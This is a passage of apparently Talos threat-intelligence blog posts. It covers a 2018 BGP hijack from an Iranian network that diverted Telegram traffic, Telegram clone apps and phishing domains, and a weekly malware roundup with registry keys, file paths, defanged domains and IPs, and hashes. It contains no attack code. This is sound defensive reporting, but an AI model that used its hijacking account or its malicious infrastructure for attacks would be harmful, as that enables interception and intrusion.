width="544" /></a></div><br />This clearly demonstrates that this group has an ongoing activity with a focus on user credentials and messaging applications.<br /><h3 id="h.w235n7h1ral7"></h3><h3 id="h.w235n7h1ral7">BGP Routing Anomalies</h3><div><br /></div><h4 id="h.2hkb43m8cthf">Background</h4><div><br /></div><div style="text-align: left;">While monitoring <a href="https://bgpstream.com/">BGPStream</a>, Cisco's database of Border Gateway Protocol (BGP) announcement, Talos noticed some routing anomalies originating from an Iranian-based autonomous system number (ASN) 58224. For those unfamiliar with this protocol, BGP is defined in <a href="https://tools.ietf.org/html/rfc4271">Request for Comments (RFC) 4271</a>, as "an inter-Autonomous System routing protocol." In this context, "a route is defined as a unit of information that pairs a set of destinations with the attributes of a path to those destinations." In short, this protocol allows for internet communications to occur when requesting a resource located outside of the requested network or autonomous system.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">BGP is used across the internet to assist with the selection of the best path routing. It's important to note this can be manipulated at ISP levels depending on various factors, which BGP allows for route selection. BGP optimizes the routing of internet traffic through the speaking system, which RFC 4271 defines as:</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The primary function of a BGP speaking system is to exchange network reachability information with other BGP systems. This network reachability information includes information on the list of Autonomous Systems (ASes) that reachability information traverses.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">These speaking systems serve as a platform for routers to send out "update messages" to neighboring systems. The process for "changing the attribute(s) of a route is accomplished by advertising a replacement route. The replacement route carries new [changed] attributes and has the same address prefix as the original route."</div><div style="text-align: left;"><br /></div><div style="text-align: left;">While this was designed as a feature to combat networking issues, there was no adequate security mechanism added to prevent it from being abused. BGP offers no mechanism for security other than some methods like MD5 passwords for neighbours, IPSec or GTSM. None of these are default requirements and as such are not necessarily widely used. This could allow someone to send out an update message with an alternate route to the same prefix or AS, even if there was no issue with the primary route.&nbsp;</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This could result in some traffic passing through a predetermined, or sub-optimal route for the victim. These routing deviations are sometimes referred to as BGP hijacking sessions. BGP hijacking sessions' effectiveness are measured based on the number of BGP peers who receive the update through messages. The more peers who receive the update message, the more likely traffic is being routed through the alternative sub-optimal path, that is pre-configured by the actor.<br /><br /></div><h4 id="h.hgpgr86j12g2">Pre-Planned Routing Activity from ASN 58224</h4><div><br /></div><div style="text-align: left;">One interesting <a href="https://bgpstream.com/event/141474">BGP routing anomaly</a> occurred on June 30, 2018 at 07:41:28 UTC. During this event, the Iranian-based ASN 58224 announced an update for the prefix 185.112.156.0/22. The Iranian telecommunications provider Iran Telecommunication Company PJS owned the ASN that sent out the update message.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This range potentially being hijacked was associated with Hungarian-based internet service provider (ISP) DoclerWeb Kft. Nine BGPmon peers detected this event, and it lasted for two hours and 15 minutes until a new update message was disseminated. While this event was quite small in scale, this could have been a trial run for a larger BGP hijack attempt.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-WLFKfZHbMzk/W-BvO7z4UhI/AAAAAAAAAUs/4pt7id0NgOs36YlTrKV5C4WhE7bTrahDgCK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.26.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://2.bp.blogspot.com/-WLFKfZHbMzk/W-BvO7z4UhI/AAAAAAAAAUs/4pt7id0NgOs36YlTrKV5C4WhE7bTrahDgCK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.26.15.png" width="640" /></a></div><br /><div style="text-align: left;">There were more significant BGP anomalies that originated from that same Iran-based ASN 58224. On July 30, 2018 at 06:28:25 UTC, four BGP routes were announced as being "more specific" at the exact same time, down to the second, impacting communications with Telegram. When routers received this update message through the speaking system, they began routing some traffic destined to the Telegram servers through the ASN 58224. This campaign proved to be particularly effective, since a large number of BGPmon peers observed it, suggesting that it propagated throughout the region via the speaking system. Just like the event one month prior, all routers received a corrected update message two hours and 15 minutes later, ending the hijack.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DiJ0fsLWFbM/W-BvgYuudtI/AAAAAAAAAU4/1htDyX4oSw82rmSPBLjKzeZmi0M28P8eACK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.27.22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://2.bp.blogspot.com/-DiJ0fsLWFbM/W-BvgYuudtI/AAAAAAAAAU4/1htDyX4oSw82rmSPBLjKzeZmi0M28P8eACK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.27.22.png" width="640" /></a></div><h4 id="h.7efj4xv6jsui"></h4><h4 id="h.7efj4xv6jsui">How BGP Hijacking could have enabled computer network operations</h4><div><br /></div><div style="text-align: left;">Theoretically, this announcement could have one component of an operation to compromise communications with Telegram servers. This hijacking session led to some Telegram messages being sent to an Iranian telecommunications provider. Other nation-state actors have used this technique in order to deliver malware, as <a href="https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/">documented by other security researchers</a>, two months prior in May 2018. Once the traffic is routed through a desired ISP, it could be subject to modification and inspection. There has been <a href="https://www.reuters.com/article/us-iran-cyber-telegram-exclusive/exclusive-hackers-accessed-telegram-messaging-accounts-in-iran-researchers-idUSKCN10D1AM">open-source reporting</a> that suggests that Iran- based telecommunication providers have previously cooperated with Iranian government requests to obtain communications. The article suggests telecommunications companies provided government officials with Telegram SMS verification codes needed to gain access to Telegram accounts.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This particular capability would be attractive, since it could allow the actors to route traffic in neighboring ASNs through Iran. This could allow the threat actors to gain access to devices in nearby countries and compromise users who utilized non-Iranian telecommunications providers.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The Iranian Minister of Information and Communications Technology, Mohammad-Javad Azari Jahromi, acknowledged this event and stated it <a href="https://en.mehrnews.com/news/136252/Minster-orders-investigation-into-data-hijacking-charges-against">will be investigated</a>. Nothing further has been publicly released regarding this investigation from the Iranian government.<br /><br /></div><h2 id="h.f8y50rc42e8x"></h2><h2 id="h.f8y50rc42e8x">Conclusions</h2><div><br /></div><div style="text-align: left;">The three techniques we discussed here are not the only ones that state-sponsored actors can use to deploy surveillance mechanisms targeting their citizens. The topic of mass internet firewalling and surveillance deployment has been in the news before. Some of these campaigns have also targeted specific applications, such as Telegram. However, these apparently unrelated events all share at least two common denominators: Iran and Telegram. These denominators should be far apart, since Iran has banned Telegram in the country. But we found that there are several Telegram clones with several thousands installations that somehow contact IP addresses located in Iran, some of them that advertise the fact that they can circumvent the ban. The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users' devices.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The long-lasting activity of groups like Charming Kitten, even while using classic phishing techniques, are still effective against users who aren't very aware of cybersecurity. Given that the common denominator of all of these activities was the citizenship, it is understandable that the vast majority of any country's population won't be as cybersecurity educated as a cybersecurity professional, so even this classic technique could be highly effective.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">While it is impossible for Talos to precisely determine the intent behind the July 30 routing update messages, Talos assess with moderate confidence that the updates were a deliberate act targeting Telegram-based services in the region. It is unlikely for four update messages to be distributed at the exact same time, to route two different Telegram ranges through four different subnets all associated with one ASN: 58224. This assessment statement also considers open-source reporting on Iran's complicated history with Telegram from <a href="https://www.nytimes.com/2018/05/01/world/middleeast/iran-telegram-app-russia.html">passing laws banning the use of Telegram</a>, to reports of outages resulting from <a href="https://twitter.com/InternetIntel/status/991334539388772353">Telegram's IP addresses being blocked in Iran</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Aside from the victims and the applications, Talos was unable to find any solid link between each of these events. This investigation was focused on Iran due to the current ban on Telegram. However, these techniques could be used by any malicious actor, being with or without state sponsorship. Talos assesses with high confidence that the users' privacy is at risk when using the applications discussed in this blog post. The overall security concerns should be taken seriously.</div><br /><h2 id="h.74u4v57c40ly">IOC</h2><h3 id="h.4xfjomnifxgc">Domains</h3>talagram[.]ir<br />hotgram[.]ir<br />Harsobh[.]com<br />ndrm[.]ir<br />andromedaa[.]ir<br />buycomment[.]ir<br />bazdiddarbazdid[.]com<br />youpo[.]st<br />im9[.]ir<br />followerbegir[.]ir<br />buylike[.]ir<br />buyfollower[.]ir<br />andromedaa[.]ir<br />30dn[.]ir<br />ndrm[.]ir<br />followerbeg[.]ir<br />viewmember[.]ir<br />ozvdarozv[.]ir<br />ozvbegir[.]ir<br />obgr[.]ir<br />likebeg[.]ir<br />lbgr[.]ir<br />followgir[.]ir<br />followbegir[.]ir<br />fbgr[.]ir<br />commentbegir[.]ir<br />cbgr[.]ir<br />likebegir[.]com<br />commentbegir[.]com<br />andromedaa[.]com<br />ozvbegir[.]com<br />ozvdarozv[.]com<br />andromedaa[.]net<br />lik3[.]org<br />homayoon[.]info<br />buylike[.]in<br />lkbgr[.]com<br />flbgr[.]com<br />andromedaa[.]com<br />mobilecontinue[.]network<br />mobilecontinue[.]network<br />mobile-messengerplus[.]network<br />confirm-identification[.]name<br />invitation-to-messenger[.]space<br />com-messengersaccount[.]name<br />broadcastnews[.]pro<br />youridentityactivity[.]world<br />confirm-verification-process[.]systems<br />sessions-identifier-memberemailid[.]network<br />mail-profile[.]com<br />download-drive-share[.]ga<br />hangouts-talk[.]ga<br />mail-login-profile[.]com<br />watch-youtube[.]live<br />stratup-monitor[.]com<br />Xn--oogle-v1a[.]ga (ġoogle[.]ga)<br />file-share[.]ga<br /><br /><h3 id="h.lwnbzsfmirej">Hash values</h3>8ecf5161af04d2bf14020500997afa4473f6a137e8f45a99e323fb2157f1c984 - BitGram<br />24a545778b72132713bd7e0302a650ca9cc69262aa5b9e926633a0e1fc555e98 - AseGram<br />a2cf315d4d6c6794b680cb0e61afc5d0afb2c8f6b428ba8be560ab91e2e22c0d followerbegir.ipa<br />a7609b6316b325cc8f98b186d46366e6eefaae101ee6ff660ecc6b9e90146a86 ozvdarozv.apk<br /><h4></h4></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/e-ugmy2EZ_k" height="1" width="1" alt=""/>2018-11-06T09:18:14.822-05:000https://blog.talosintelligence.com/2018/11/persian-stalker.htmlThreat Roundup for Oct. 26 to Nov. 2http://feedproxy.google.com/~r/feedburner/Talos/~3/P0-b_jT0_Oo/threat-roundup-1019-1102.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 02 Nov 2018 11:03:00 PDTtag:blogger.com,1999:blog-1029833275466591797.post-9166487153045093229<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://3.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/LKehnkoxdbQOVRk2Nl5tvFBv3ogo-VzogCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 26 and Nov. 02. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />You can find an additional <a href="https://alln-extcloud-storage.cisco.com/ciscoblogs/5bdc8f23c0373.txt">JSON file here</a> that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.<br /><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Win.Malware.Zbot-6732674-0</b><br /> Malware<br /> Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.<br />&nbsp;</li><li><b>Win.Malware.Sivis-6734391-0</b><br /> Malware<br /> Sivis is a type of trojan that is usually downloaded from the internet and installed by unsuspecting users. This trojan variant also includes sandbox evasion logic. It has the ability to move numerous files to the Recycle Bin.<br />&nbsp;</li><li><b>Win.Malware.Explorerhijack-6734396-0</b><br /> Malware<br /> A hijacker could use this malware to change the user's browser's home page, redirect the user to suspicious websites, and then lead them to advertisements and commercial content that generates pay-per-click revenue for its developers.<br />&nbsp;</li><li><b>Xls.Malware.Cwsp-6735643-0</b><br /> Malware<br /> This is an Excel-based downloader that uses PowerShell to retrieve the next stage of the malware executable. Microsoft Office displays a warning to the user before the payload actually gets activated.<br />&nbsp;</li><li><b>Win.Trojan.Mikey-6735890-0</b><br /> Trojan<br /> This cluster focuses on malware that creates a specific cluster so the malware can achieve persistence. The samples have anti-analysis tricks to complicate the analysis. This family is known for the plugin architecture and for the intense network activity. This week, Mikey used the AppWizard packaging system. It is based on common Microsoft code, using the Microsoft Foundation Classes (MFC) to start a simple application. Malicious programs use this packer to stage process hollowing and obfuscate the malicious code.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Win.Malware.Zbot-6732674-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\software\Wow6432Node\microsoft\windows nt\currentversion\winlogon </li><li>&lt;HKLM&gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON <ul><li>Value Name: userinit</li></ul></li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\SysWOW64\ntos.exe</li></ul><b>File Hashes</b><br /><ul><li>0105bb0a81ceb78f84de07f7336a6ecdd95721545b3e47c96ae45f94a8fe8506</li><li>0114885e69a066a72f12eb475c9ae36e0851309ce6902a547dd60915ab785523</li><li>01be29f0973f96218bf0554f2212ee60fe8563a9fa5e9f1cc04b948a02a5989a</li><li>0280026374e8bc24bd0987abde9c8ded202bc489e0f718c2fbd87d541f2003e0</li><li>03262248439bc3ed3af3cc12a50d3595a0230b6a01fd3c6e34838750a01a4b72</li><li>03480a5dda4243eec0e9826a386729670c50c9cdcfd12109febf16695e7302ce</li><li>03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb</li><li>03c2c34bd542dde2d600697bb658399498be9ff74614ab938adb3f77a4183c4c</li><li>0462f5a9a36956eb62b958203d66e1ad83268502f7ee6a2676e47d3829db1e03</li><li>06c57ae21c9f839895f847a5d8895fdc89e878a615565772246c94887caaf6cb</li><li>075b5ad9b36d79b3b14ad43decabdd7f07fbd3d428e890a14ee2af4969ba49e5</li><li>08866b56758d4c7b783af2faa3465a9c3dcb2621b19ded098ccb17e25e4f685a</li><li>08db11f50735c3f4d34d308bc190ae8db0cc6b291090716781ced208b13743fa</li><li>0a00e118d1917356a4598d2e5f3a96f184726cb37e6be4cfa70ad233fcf5be8a</li><li>0a0e93af895754435be151f0f09d3fcd542661c9e48314a82bfa4853be9212fe</li><li>0a4d7fbd10835ba00bd6518598f0c3a4670207e52e4c8c57a5500f0c4059a017</li><li>0a963367e108b56e58559846236f1896adcca5ec6e324330739e3b45d436e1dd</li><li>0b675493051c7f99878bca3510c5054bbc071612557acb008e9ae8980c6364ed</li><li>0b7143f5062cada3d26a97f59b10ddf8e2a73ea70dc97c7cb55a5ceef7e7e5d8</li><li>0b76777a484d6e0304bfc0b0c06576a51bca2a5cf6a648dfdf67f296301af3d4</li><li>0bc190d365d58acc24ec202637d87296c69c9f2d2dc4e7120d8f3b61ffc584bc</li><li>0c4533fd8ae2a9629f474373ce2697059e978e8f5945b4421d092a7052b9c64c</li><li>0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36</li><li>0ef146b745e8b57ed0f3b0cd888f650fb8510670731e5c01419e13722178d1d9</li><li>114f30f079e04714958728d7364b706dd8e88a241bd0771326d10c445d4fc95c</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-TvfnGbCq1iA/W9yKmNa1m3I/AAAAAAAABFY/Uegx6-jXu2Q8oXLgRUZqzXXv6oY-KZ7bACLcBGAs/s1600/0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-TvfnGbCq1iA/W9yKmNa1m3I/AAAAAAAABFY/Uegx6-jXu2Q8oXLgRUZqzXXv6oY-KZ7bACLcBGAs/s400/0e12afb0ec9aca39a02927e158883994dc6110f83880b5075aebcaed8077ce36_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pxmUY7r-I3c/W9yKsJkAjSI/AAAAAAAABFc/751P7pVsQDs9G4wX6FY9exDwiJXHYsXWwCLcBGAs/s1600/03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="962" height="334" src="https://4.bp.blogspot.com/-pxmUY7r-I3c/W9yKsJkAjSI/AAAAAAAABFc/751P7pVsQDs9G4wX6FY9exDwiJXHYsXWwCLcBGAs/s640/03746100716d1a66312b69c03ba2166aab6075f24ca826197972bf30a117dadb_tg.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Malware.Sivis-6734391-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\$Recycle.Bin\&lt;USER-SID&gt;\$RZ7KADN.txt</li><li>\$Recycle.Bin\&lt;USER-SID&gt;\$RYGDGS7.lnk</li><li>%AppData%\Mozilla\Firefox\Profiles\iv5rtgu3.default\key3.db</li></ul><b>File Hashes</b><br /><ul><li>2073825ad497c12861800c93527e49e8aa4afafe77d1a7af2922ab707c4b258e</li><li>2c43a96efe6f36ef0e1e1ca7f4dfe34c83bdd1d99090a056d43955e70bae719f</li><li>2ff58a8b69dcb0dbb1ef63430a925068d586860c84faa583988b92e2bb87ef25</li><li>30a9b4c8db8eae33a1e9c35f6441e171cb8059a0f6c34bc8d377e064f3000008</li><li>32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d</li><li>32fb050134eefd9bba3f5a1d31c9727c0a25760e8b2342385b24b20a253e9512</li><li>34c5950ff21c25a4acbc1801f881d205ba2cae42333bb04358cf5117eef645b2</li><li>447e4f61b3e3a5ccf116346d228d1b80328a63e54fc71398e4894d70c22ff51d</li><li>4d6ac5ccca2bab50f296a4e34a7bed16131f01fdf6864c2bee8efbfea449697b</li><li>51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab</li><li>581391e344bda3539189aef8252556f916bf27333e755765641a1485844b884f</li><li>66ada213ce8d9756c1c711d216d45ef8cc84586a1dc46213ce8275d4f8a7d08f</li><li>7d0ab4517139c8347e39af92cf8dafb9c71e80a8848cea25d7e4598292753fac</li><li>7f49ac352ec83b003ca00b29acafdf5c08132f0bd060151312157773e06a887d</li><li>8564af9b09f0ade9b372d76a0d53355587b28cc89afec83b9287cebe6dbce148</li><li>8cca573e22a563ae4074007c9b5c5abd11316a0235f206242baf4936f3cff4fb</li><li>91487940c217c106a1f70ea4f850db083396a8fd5c37e81c47d4cd01ef269906</li><li>9813d3fa86989ca43ecc0db5684e642823abebca58161d8676276349bb5c53ea</li><li>b3be19db0aa19fc9588cb90d0ee5c39ae124e797b82ba1eeb02ba0b82c9a55f8</li><li>beb78637a890b73e150cc67b1c51108dc89e7b3e491ed22cc81695eda729e10f</li><li>c405942083f1d75a6de07f9270e94594cfd99b59c774f22bd2c214715822a851</li><li>c5405c94a49bd14155027aea5722bf253eeedd1a3d0d1d73a2580adb70a6def7</li><li>cc542bacf782757a362d3b6cfc54efe64f8abb860f7c997cf008cc0ae9ffcee6</li><li>d2f9541628e3178b1e6cead482d9983e1509edd3155244b42ac49f0a6919d690</li><li>d7ecfd142025e761006a446d1bd68a9f337eaf1f927fbc01fbbe336df39befae</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-2og45oKVqNg/W9yK5AjAifI/AAAAAAAABFg/zkMkXrDd9HceW8vk1Ta1H3w-0VviPh-XQCLcBGAs/s1600/51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-2og45oKVqNg/W9yK5AjAifI/AAAAAAAABFg/zkMkXrDd9HceW8vk1Ta1H3w-0VviPh-XQCLcBGAs/s400/51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-BiPNQSW1ZCA/W9yK-x4F47I/AAAAAAAABFo/Be8NxhIBH6kxyKDtj38nQEXh_4wePV5mACLcBGAs/s1600/32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-BiPNQSW1ZCA/W9yK-x4F47I/AAAAAAAABFo/Be8NxhIBH6kxyKDtj38nQEXh_4wePV5mACLcBGAs/s640/32e5b6a36aa94734f0af2cc7d2235bbfeecc915fc0bc0bf46f385f238dc1b69d_tg.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Explorerhijack-6734396-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SESSIONINFO\1\LogonSoundHasBeenPlayed </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>103[.]235[.]47[.]123</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\347749632.exe</li></ul><b>File Hashes</b><br /><ul><li>0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8</li><li>39ad7614f81cf505be13fb726d9a68585ebcfb4ba3c156e7974e23a71c8254f1</li><li>41569db09055ec3bbd900f943c3049b6362be1fc08e73bf9403c6e0a684b5aed</li><li>7f25aa88bb56ce9888d3959344307b5c7423f53ef1409f84534dd82f2520eb92</li><li>856c90d502181b0297d792c67ab0d5e3d78fac4879e853beab00e10707e1c5dd</li><li>99e9c70014473728f7cfac4704c4961cb9cf1e6cb015bb1da6bb095fea13ecaa</li><li>a4143241cfa447db8fa7d4ec5ef79a6bd0a78b853d8f461f209e1224ea09f34f</li><li>e957fa484e5b1b1c84a0f4d3e3561686fe6d289f703ec2ff1f4d9fec886e1344</li><li>f57061d301bce0ecb0b1caf8b0e0de238ecccd4f038f4e9a397ab1cdde57e9a2</li><li>fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-h9mXzmt8d7o/W9yLNS-GtbI/AAAAAAAABFs/vYP5-x0mMwg1bBF4NqWpkJFO-LwoeMSpgCLcBGAs/s1600/fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-h9mXzmt8d7o/W9yLNS-GtbI/AAAAAAAABFs/vYP5-x0mMwg1bBF4NqWpkJFO-LwoeMSpgCLcBGAs/s400/fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-RGOh536OPxg/W9yLSV6Mg5I/AAAAAAAABFw/kvlZkKyV5-8Bac1n0B0nLJZrf7mMu6rTgCLcBGAs/s1600/0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-RGOh536OPxg/W9yLSV6Mg5I/AAAAAAAABFw/kvlZkKyV5-8Bac1n0B0nLJZrf7mMu6rTgCLcBGAs/s640/0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8_tg.png" width="640" /></a></div><b><br /></b><br /><h3>Xls.Malware.Cwsp-6735643-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>212[.]58[.]244[.]48</li><li>208[.]91[.]197[.]13</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>lalecitinadesoja[.]com</li><li>downloads[.]bbc[.]co[.]uk</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\1ii4ushk.rdy.ps1</li><li>%LocalAppData%\Temp\i3iu3ax4.unx.psm1</li><li>%AppData%\23C.exe</li></ul><b>File Hashes</b><br 